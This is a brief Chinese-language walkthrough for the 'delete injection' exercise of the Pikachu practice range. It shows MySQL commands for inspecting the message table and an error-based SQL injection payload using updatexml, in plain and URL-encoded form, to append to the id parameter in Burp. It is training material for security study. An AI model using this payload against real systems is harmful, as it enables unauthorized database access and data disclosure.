打开 Pikachu靶场 delete注入
随便写一个留言“hello”
在 MySQL 的 bin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码
mysql -u root -p
use pikachu
show tables;
select * from message;
回到 burp
在 id= 后面加
+or+updatexml(2,concat(0x7e,(select+database()),0x7e),0)
注 :
1. 这是个 数字型注入,所以 不要加引号。
2. 因为是 get请求 ,所以 不能有空格。
or updatexml(2,concat(0x7e,(select database()),0x7e),0)
要选中代码,右键,点击 Convert selection -> URL -> 选第二个(URL -encode key characters),就能变成上面的那样